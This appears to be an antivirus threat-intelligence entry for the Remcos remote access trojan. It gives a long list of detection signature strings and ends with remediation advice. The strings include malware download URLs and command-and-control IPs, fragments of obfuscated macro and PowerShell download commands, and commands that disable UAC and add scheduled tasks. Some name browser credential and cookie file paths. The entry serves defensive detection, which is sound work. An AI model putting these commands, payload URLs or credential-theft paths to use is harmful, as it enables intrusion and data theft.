Concrete signature match: Trojan - Appears legitimate but performs malicious actions for JavaScript platform, family Remcos
This is a concrete detection of Trojan:JS/Remcos, a JavaScript-based Remote Access Trojan (RAT). It aims to disable User Account Control (UAC), capture screenshots, and establish command-and-control (C2) communication to download further payloads, enabling extensive surveillance and system control.
Relevant strings associated with this threat:
- Remcos_Mutex_Inj (PEHSTR_EXT)
- EnableLUA /t REG_DWORD /d 0 (PEHSTR_EXT)
- getscrslist (PEHSTR_EXT)
- screenshotdata (PEHSTR_EXT)
- Breaking-Security.Net (PEHSTR_EXT)
- Remcos_Mutex_Inj (PEHSTR)
- REMCOS (PEHSTR_EXT)
- Screenshots (PEHSTR_EXT)
- remcos (PEHSTR_EXT)
- Remcos (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Uninstall (PEHSTR_EXT)
- set_UseShellExecute (PEHSTR_EXT)
- zdvT_i1jso3v7MtW0/es.uugu.a//:sptth (PEHSTR_EXT)
- gdead/dead-lyrics/ (PEHSTR_EXT)
- China_Cat_Sunflower.txt (PEHSTR_EXT)
- \shell\open\command (PEHSTR_EXT)
- OpenAs_RunDLL (PEHSTR_EXT)
- Test.thg (PEHSTR_EXT)
- sfhjffkfhgfdjsrfhhddfhfffadsgfasfhsscffgdb (PEHSTR_EXT)
- = CreateObject("Msxml2.DOMDocument.3.0") (MACROHSTR_EXT)
- Load "http://185.172.110.217/robx/remit.jpg (MACROHSTR_EXT)
- Pspl.Create(Nxayp, Null, Null, mh0f5) (MACROHSTR_EXT)
- C:\Users\Yak\Desktop\Alt_R66Draw\T___imgFig.pas (PEHSTR_EXT)
- C:\Users\Yak\Desktop\Alt_R66Draw\T__RGroup.pas (PEHSTR_EXT)
- C:\Users\Yak\Desktop\Alt_R66Draw\T__RUndo.pas (PEHSTR_EXT)
- C:\Users\Yak\Desktop\Alt_R66Draw\T__RSelFrm.pas (PEHSTR_EXT)
- C:\Users\Yak\Desktop\Alt_R66Draw\T__RCore.pas (PEHSTR_EXT)
- davidemauri.it (PEHSTR_EXT)
- opablo@gmail.com (PEHSTR_EXT)
- Decompress (PEHSTR_EXT)
- Compress (PEHSTR_EXT)
- = MVNID.OpenTextFile(OGlq + "\ZrTSy.vbs", 8, True) (MACROHSTR_EXT)
- Dir(f5fg0e + "\ZrTSy.vbs") = "" Then (MACROHSTR_EXT)
- Nursery_Management_System.signIn.resources (PEHSTR_EXT)
- Nursery_Management_System.sign.resources (PEHSTR_EXT)
- Nursery_Management_System.signUp.resources (PEHSTR_EXT)
- Nursery_Management_System.Analytics.resources (PEHSTR_EXT)
- Nursery_Management_System.Properties.Resources.resources (PEHSTR_EXT)
- Nursery_Management_System.childDailyDetails.resources (PEHSTR_EXT)
- Nursery_Management_System.adminPendingRequests.resources (PEHSTR_EXT)
- \AppData\Roaming\remcos\ (PEHSTR_EXT)
- \AppData\Roaming\Screenshots\ (PEHSTR_EXT)
- get_SplashScreen1 (PEHSTR_EXT)
- DbCommand (PEHSTR_EXT)
- Lerlibro_INC.ucUsers.resources (PEHSTR_EXT)
- //107.189.4.70/693.bin (PEHSTR_EXT)
- Jioz.NewFileForm.resources (PEHSTR_EXT)
- Jioz.PropertiesForm.resources (PEHSTR_EXT)
- HttpWebResponse (PEHSTR_EXT)
- %systemroot%\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe (PEHSTR_EXT)
- ttps:// (PEHSTR_EXT)
- BreakingSecurity.net (PEHSTR_EXT)
- Remcos restarted by watchdog (PEHSTR_EXT)
- Remcos v (PEHSTR_EXT)
- SbieDll.dll (PEHSTR_EXT)
- HARDWARE\ACPI\DSDT\VBOX__ (PEHSTR_EXT)
- \SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA (PEHSTR_EXT)
- .exe (PEHSTR_EXT)
- //cdn.discordapp.com/attachments/ (PEHSTR_EXT)
- \Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe (PEHSTR_EXT)
- SOFTWARE\Borland\Delphi\RTL (PEHSTR_EXT)
- cdn.discordapp.com (PEHSTR_EXT)
- C:\Users\Public\Libraries\TEMP (PEHSTR_EXT)
- amsl.Run "P" + mJJGM(fgfjhfgfg), 0 (MACROHSTR_EXT)
- = mJJGM("B0A85DF40" + fjjsdfhl() + j00ffdgdf() + tter7fdg0() (MACROHSTR_EXT)
- &Microsoft.VisualBasic.CompilerServices (PEHSTR)
- 4System.Web.Services.Protocols.SoapHttpClientProtocol (PEHSTR)
- outCompiled.exe (PEHSTR)
- System.CodeDom.Compiler (PEHSTR)
- System.Security (PEHSTR_EXT)
- ShutDownDlg.dll (PEHSTR_EXT)
- \Software\Microsoft\Internet Explorer\Main (PEHSTR_EXT)
- RunDlg.dll (PEHSTR_EXT)
- CheckIC.dll (PEHSTR_EXT)
- Remote_Administration_Tool.Properties.Resources (PEHSTR_EXT)
- CaptureScreenImage.Properties.Resources (PEHSTR_EXT)
- VB_blackjack.My.Resources (PEHSTR_EXT)
- zCom.resources (PEHSTR_EXT)
- .tmp.exe (PEHSTR_EXT)
- PrimeX.Tools.Properties.Resources (PEHSTR_EXT)
- shutdowntimer.Properties.Resources (PEHSTR_EXT)
- Video_Capture_DonK.Properties.Resources (PEHSTR_EXT)
- Ddd.Resources.resources (PEHSTR_EXT)
- BaseConfigHandler.My.Resources (PEHSTR_EXT)
- Stub.g.resources (PEHSTR_EXT)
- SQLTutorial.Resources.resources (PEHSTR_EXT)
- ndtia_Live_Server.Resources (PEHSTR_EXT)
- Cards_Interfaces.My.Resources (PEHSTR_EXT)
- ReflectionExtensions.My.Resources (PEHSTR_EXT)
- MiniCalc.Resources (PEHSTR_EXT)
- GameProject.My.Resources (PEHSTR_EXT)
- PM_FormsAvgCalc.Resources (PEHSTR_EXT)
- PointOfSale.Properties.Resources (PEHSTR_EXT)
- Graph.Properties.Resources (PEHSTR_EXT)
- IdOps.My.Resources (PEHSTR_EXT)
- FileZillaProject.My.Resources (PEHSTR_EXT)
- WindowsApp2.My.Resources (PEHSTR_EXT)
- WindowsApplication1.My.Resources (PEHSTR_EXT)
- ShaharMarket.Resources (PEHSTR_EXT)
- Coursework.My.Resources (PEHSTR_EXT)
- FixAPix.Resources (PEHSTR_EXT)
- Image_Editor.Resources (PEHSTR_EXT)
- Codewords.Resources.resources (PEHSTR_EXT)
- GameMaker.Resources (PEHSTR_EXT)
- CDA.My.Resources (PEHSTR_EXT)
- Coronovirus.Coronovirus (PEHSTR_EXT)
- file:/// (PEHSTR_EXT)
- exe.rtpoz/061860176029740319/910917017564740319/stnemhcatta/moc.ppadrocsid.ndc//:sptth (PEHSTR_EXT)
- first.Properties.Resources (PEHSTR_EXT)
- Page_Restore.My.Resources (PEHSTR_EXT)
- Singleton_Vote_Manager.Properties.Resources.resources (PEHSTR_EXT)
- Remcos restarted by watchdog! (PEHSTR_EXT)
- ExceptionDispatch.Properties.Resources (PEHSTR_EXT)
- GraphicsUtility.Properties.Resources (PEHSTR_EXT)
- blue32_c.exe (PEHSTR_EXT)
- FoxGameOfLife.My.Resources (PEHSTR_EXT)
- tela_inicial.My.Resources (PEHSTR_EXT)
- WaterBilingSystem.Main.resources (PEHSTR_EXT)
- costura. (PEHSTR_EXT)
- .dll (PEHSTR_EXT)
- .compressed (PEHSTR_EXT)
- diejc.dll (PEHSTR_EXT)
- C:\TEMP\ns (PEHSTR_EXT)
- ExecShell (PEHSTR_EXT)
- %s%s.dll (PEHSTR_EXT)
- money.Strategies (PEHSTR_EXT)
- money.exe (PEHSTR_EXT)
- .Definitions (PEHSTR_EXT)
- .Attributes (PEHSTR_EXT)
- .Properties (PEHSTR_EXT)
- stub\UopyEx\achiiMe (PEHSTR_EXT)
- JustChess.Properties (PEHSTR_EXT)
- \kiichi\work\ImageResizeTest\geo-elevation.png (PEHSTR_EXT)
- 127.0.0.1:8081 (PEHSTR_EXT)
- OQDXkW<_(V?cqK.lJ>-*y&zv9prf8biYCFeMxBm6ZnG3H4OuS1UaI5TwtoA#Rs!,7d2@L^gNhj)EP$0 (PEHSTR)
- UCOMIExpando (PEHSTR_EXT)
- ComputeHash (PEHSTR_EXT)
- PolTraget.vbp (PEHSTR_EXT)
- students_and_employees.ToggleState (PEHSTR_EXT)
- trevnoC.metsyS (PEHSTR_EXT)
- HttpWebRequest (PEHSTR_EXT)
- /store2.gofile.io/download/ (PEHSTR_EXT)
- FastFind.Properties.Resources (PEHSTR_EXT)
- Sy!stem.Refl!ection.As!sembly (PEHSTR_EXT)
- commdlg_FindReplace (PEHSTR_EXT)
- Mqypdx\egc (PEHSTR_EXT)
- WinHttpCrackUrl (PEHSTR_EXT)
- Read Icon List for Delphi 3.0 (PEHSTR_EXT)
- uplooder.net (PEHSTR_EXT)
- wener/ gifnocpi (PEHSTR_EXT)
- esaeler/ gifnocpi (PEHSTR_EXT)
- laxyman.000webhostapp.com (PEHSTR_EXT)
- .edom SOD ni nur eb tonnac margorp sihT! (PEHSTR_EXT)
- coler. (PEHSTR_EXT)
- crsr. (PEHSTR_EXT)
- txet. (PEHSTR_EXT)
- DllRegisterServer (PEHSTR_EXT)
- LibrarySystem.Properties.Resources (PEHSTR_EXT)
- exe.4ewrepooc (PEHSTR_EXT)
- car_rental.Properties.Resources (PEHSTR_EXT)
- moc.ppadrocsid.ndc//:sptth (PEHSTR_EXT)
- GetExecutingAssembly (PEHSTR_EXT)
- BeeHiveManagementSystem.Properties.Resources (PEHSTR_EXT)
- /stnemhcatta/moc.ppadrocsid.ndc//:sptth (PEHSTR_EXT)
- gdgasfwq.gdgasfwq (PEHSTR_EXT)
- http://trietlongvinhvien.info/.tmb/ (PEHSTR_EXT)
- https://www.uplooder.net/img/image/40/e36bebd22260c03f3a40b6348976fa5b/WMI-Provider-Host.jpg (PEHSTR_EXT)
- https://cdn.discordapp.com/attachments/932413459872747544/933098893019861042/Jdnpanki.bin (PEHSTR_EXT)
- http://trietlongvinhvien.info//.tmb/ (PEHSTR_EXT)
- EmlakOtomasyonu.Properties.Resources (PEHSTR_EXT)
- exe.kcad/tdba/171.571.34.971//:ptth (PEHSTR_EXT)
- transfer.sh/get/dXGcIL/bbddll.txt (PEHSTR_EXT)
- transfer.sh/get/xwYA0C/ch.txt (PEHSTR_EXT)
- Wp1.Form1.resources (PEHSTR_EXT)
- telDir.Resources (PEHSTR_EXT)
- S#q-}=6{)BuEV[GDeZy>~M5D/P&Q}7< (PEHSTR_EXT)
- CompressionLevel (PEHSTR_EXT)
- calina-crack.store/loader/uploads/services_Vxnwfiwc.bmp (PEHSTR_EXT)
- 91.243.44.142/arx-777Ofdds_Suadocfq.png (PEHSTR_EXT)
- uplooder.net/img/image/48/0eda3c83452f40cb3b4ba01965a35433/Fkned.jpg (PEHSTR_EXT)
- vkcgroups.com/loader/uploads/Quote_Wdmahgcs.jpg (PEHSTR_EXT)
- x.rune-spectrals.com/loader/uploads/GxvGhjKm_Gxvwanla.jpg (PEHSTR_EXT)
- 91.243.44.142/pl-Ukxamliyg_Wqxbcfti.png (PEHSTR_EXT)
- kotadiainc.com (PEHSTR_EXT)
- philox.ddns.net (PEHSTR_EXT)
- SmallestEnclosingCircle.Properties.Resources (PEHSTR_EXT)
- CompressionMode (PEHSTR_EXT)
- "powe" + "rs" + Range("F100").Value (MACROHSTR_EXT)
- ggg.ExecMethod_(HByn(), f8df00) (MACROHSTR_EXT)
- "C" + ActiveSheet.PageSetup.LeftFooter + fjjdf() (MACROHSTR_EXT)
- CreateObject(ActiveSheet.PageSetup.CenterHeader) (MACROHSTR_EXT)
- ZIARb().Exec kogH3 (MACROHSTR_EXT)
- For Each ZvFDlwx In ActiveWorkbook.BuiltinDocumentProperties (MACROHSTR_EXT)
- = "p" + ActiveSheet.PageSetup.CenterFooter (MACROHSTR_EXT)
- cAlHep.Open (rNJoz + "\afJNP.js") (MACROHSTR_EXT)
- ActiveSheet.OLEObjects(1).Copy (MACROHSTR_EXT)
- MEDIA\GFX\LittleDuck.bmp (PEHSTR_EXT)
- MEDIA\GFX\GaugeKill.bmp (PEHSTR_EXT)
- .itext (PEHSTR_EXT)
- Cortez.Properties.Resources (PEHSTR_EXT)
- ='eW.teN tc' + 'ejbO-weN(';$Ax1='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.dapeton\''+pmet:vne$,''sbv.tneilC detcetorP/ababila/kt.denik//:ptth''( (MACROHSTR_EXT)
- bdfdf=t8g0f.open(v0df+"\citwz.bat")endfunctionfunctionrev(s)dimpforp=len(s)to1step-1rev=rev&mid(s,p,1)nextendfunctionfunctionikfwq() (MACROHSTR_EXT)
- omwmlf=pathy+"\citwz.bat"'youcanspecifyherethetextfilenameyouwanttocreate (MACROHSTR_EXT)
- =range("a1").valueendfunction (MACROHSTR_EXT)
- .self.invokeverb"pa"+"ste"endfunctionprivatefunction (MACROHSTR_EXT)
- .open( (MACROHSTR_EXT)
- .j"+"s")endsubsub (MACROHSTR_EXT)
- constuser_profile=&h28&activesheet.oleobjects(1).copyset (MACROHSTR_EXT)
- //209.127.20.13/ (MACROHSTR_EXT)
- .xm*w (SNID)
- =createobject(adlnw())setwyyss=iwxn.methods_(activesheet.pagesetup.leftheader)._ (MACROHSTR_EXT)
- ggg,f8df00)setsjtn=ggg.execmethod_(zcfw(),f8df00)endfunctionprivatefunctionfjjdf()fjjdf= (MACROHSTR_EXT)
- .methods_(activesheet.pagesetup.leftheader)._ (MACROHSTR_EXT)
- +fjjdf()endfunctionfunctionfkldf(ggg,f8df00)setsjtn=ggg.execmethod_( (MACROHSTR_EXT)
- ://loft.london/vendor/phpunit/phpunit/src/Util/PHP/oder.exe (MACROHSTR_EXT)
- TripleDESCryptoServiceProvider (PEHSTR_EXT)
- Othubpm.exe (PEHSTR_EXT)
- rundll32.exe %sadvpack.dll,DelNodeRunDLL32 (PEHSTR_EXT)
- rundll32.exe %s,InstallHinfSection %s 128 %s (PEHSTR_EXT)
- cmd /c cmd < (PEHSTR_EXT)
- .htm & ping -n 5 localhost (PEHSTR_EXT)
- Command.com /c %s (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\RunOnce (PEHSTR_EXT)
- 214da9226666a1.Resources.resources (PEHSTR_EXT)
- SimulationRemonteeSki.T1.resources (PEHSTR_EXT)
- Invoke-WebRequest -Uri ""https://transfer.sh/get/qIND4E/Rchnpc.exe"" -OutFile (MACROHSTR_EXT)
- 80.66.75.36 (PEHSTR_EXT)
- cmd /c cmd < Preferences.vsd & ping -n 5 localhost (PEHSTR_EXT)
- LkXE.exe (PEHSTR_EXT)
- 2023CryptsDone\DarkModeForms\obj\Debug\DarkModeForms.pdb (PEHSTR_EXT)
- _Header_dllink (PEHSTR_EXT)
- war.pdb (PEHSTR_EXT)
- FileRenamer\obj\Debug\FIco.pdb (PEHSTR_EXT)
- RestaurantApp.AccountControl (PEHSTR_EXT)
- RestaurantApp.ContactControl (PEHSTR_EXT)
- RestaurantApp.DefaultControl (PEHSTR_EXT)
- RestaurantApp.LoginControl (PEHSTR_EXT)
- RestaurantApp.MenuControl (PEHSTR_EXT)
- RestaurantApp.NutritionControl (PEHSTR_EXT)
- RestaurantApp.RestaurantControl (PEHSTR_EXT)
- RestaurantApp.WelcomeControl (PEHSTR_EXT)
- SolaraBootstrapper\bin\Release\Bootstrapper.pdb (PEHSTR_EXT)
- sgfhjffffgdhjsrfhddfhfffaddsfsfsscfgdb (PEHSTR_EXT)
- CRM02.Properties.Resources.resources (PEHSTR_EXT)
- CRM02.Properties (PEHSTR_EXT)
- sfhjffkfhgfdjsrfhdfdfhfffadsgfahsscffgdb (PEHSTR_EXT)
- WindowsFormsApp50.Properties.Resources.resource (PEHSTR_EXT)
- Documents\CryptoObfuscator_Output\BHHHG66.pdb (PEHSTR_EXT)
- QnovDRkgfnoOaikMMsqL.res (PEHSTR_EXT)
- sgfhjffffgdhjsrfhddfhfffadfsfsscfgdb (PEHSTR_EXT)
- RandomMaker.Properties.Resources (PEHSTR_EXT)
- 5Assembled.Program (PEHSTR_EXT)
- Njswpsg (PEHSTR_EXT)
- %homedrive%\eegv (PEHSTR_EXT)
- ;r. X( (SNID)
- :/Users/Admin/AppData/Roaming/installer/installer/main.go (PEHSTR_EXT)
- geoplugin.net/json.gp (PEHSTR_EXT)
- sysinfo.txt (PEHSTR_EXT)
- update.vbs (PEHSTR_EXT)
- fso.DeleteFile (PEHSTR_EXT)
- WNHBNMKL.exe (PEHSTR_EXT)
- cdn.discordapp.com/attachments/ (PEHSTR_EXT)
- Zptcs.exe (PEHSTR_EXT)
- Failed to execute the .bat file (PEHSTR_EXT)
- cmd/Cstart/B (PEHSTR_EXT)
- jenkins-workspace\workspace\client-builder-product\Build\Win32\Release\utorrent.pdb (PEHSTR_EXT)
- =[/"{ (SNID)
- MeshViewer.MeshViewer.resources (PEHSTR_EXT)
- NotThere.Properties.Resources.resources (PEHSTR_EXT)
- https://github.com/Saad888/AutoSynthesis/issues (PEHSTR_EXT)
- MagicBar.Properties.Resources (PEHSTR_EXT)
- https://groundbreakingsstyle.com/wp-content/nanofolder/img-files/VFLient.vas (PEHSTR_EXT)
- OxyPlotting.EWGibraltar (PEHSTR_EXT)
- C:\Users\Administrator\Desktop\Outputs\YgZBrsLNe.pdb (PEHSTR_EXT)
- AsnanyDentalClinic.Properties (PEHSTR_EXT)
- dobbelteksponeringer\Microsoft\Windows\horizontical\Uninstall\spalteteksternes (PEHSTR_EXT)
- vandrerkortet\Angrebstidspunktet\indonesiens (PEHSTR_EXT)
- unsped\akkorderingernes (PEHSTR_EXT)
- schtasks /create /tn "Alis Cloud" /tr " (PEHSTR_EXT)
- X{gJ. (SNID)
- w124728_New_Text_Document.txt (PEHSTR_EXT)
- https://imgurl.ir/download.php (PEHSTR_EXT)
- Project_Calendar.Properties.Resources.resources (PEHSTR_EXT)
- Kronus.exed (PEHSTR_EXT)
- Kronus.dll (PEHSTR_EXT)
- bcrypt.dll (PEHSTR_EXT)
- FManagerApp.Properties.Resources (PEHSTR_EXT)
- CS50_Medical_App.Welcome.resources (PEHSTR_EXT)
- 2023CryptsDone\drwk (PEHSTR_EXT)
- exporterWorker_RunWorkerCompleted (PEHSTR_EXT)
- lameExeDownloadSite (PEHSTR_EXT)
- pwsgl3.Properti (PEHSTR_EXT)
- reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System (PEHSTR_EXT)
- User Data\Default\Cookies (PEHSTR_EXT)
- CreateObject("WScript.Shell").Run "cmd (PEHSTR_EXT)
- \sysinfo.txt (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows NT\CurrentVersion (PEHSTR_EXT)
- Remcos Agent initialized (PEHSTR_EXT)
- \AppData\Local\Google\Chrome\User Data\Default\Login Data (PEHSTR_EXT)
- \AppData\Local\Google\Chrome\User Data\Default\Cookies (PEHSTR_EXT)
- AppData\Roaming\Mozilla\Firefox\Profiles\ (PEHSTR_EXT)
- \logins.json (PEHSTR_EXT)
- \key3.db (PEHSTR_EXT)
- ToDoList.Properties.Resources.resources (PEHSTR_EXT)
- Projektni_zadatak.Properties.Resources (PEHSTR_EXT)
- AttendanceTracker.Properties.Resources.resources (PEHSTR_EXT)
- QLBH.Properties.Resources.resources (PEHSTR_EXT)
- PitchAnalytics.Properties.Resources (PEHSTR_EXT)
- Book_Mgt_System.Properties.Resources.resources (PEHSTR_EXT)
- Execute (PEHSTR_EXT)
- Slicer.Properties.Resources.resources (PEHSTR_EXT)
- Cycle_Jump_Game.Properties.Resources.resources (PEHSTR_EXT)
- StormCast.Properties.Resources.resources (PEHSTR_EXT)
- 32\A.DLL (PEHSTR_EXT)
- SmartNote.Properties.Resources (PEHSTR_EXT)
- CSVViewer.Forms.MainForm.resource (PEHSTR_EXT)
- Source_code.Properties.Resources (PEHSTR_EXT)
- HostPinger.Properties.Resources (PEHSTR_EXT)
- !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
- rundll32 (PEHSTR_EXT)
- !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
- !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
- !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)1303bf5504a5d6c2a717815dc5a0aa36285cff6438f562d4928c47ec49c6dd64626ec1fa145051853e353adf624e2cf4227564c156c1c6cf72f2546fc7d2546093e255283db179c074c917be8e99cdd4b7aa8cc7c6eea2c811dab9ec980bb83ef79c06795ae5144703e4e4d14424f944f26625e77ec20c802fa3ca47cc4659bfImmediately isolate the infected system from the network. Perform a full system scan with updated antivirus, remove all detected threats, and block associated malicious IPs (e.g., 185.172.110.217) at the network perimeter. Due to the nature of RATs, a full system reimage is strongly recommended after backing up essential data, and all user credentials used on the compromised machine should be reset.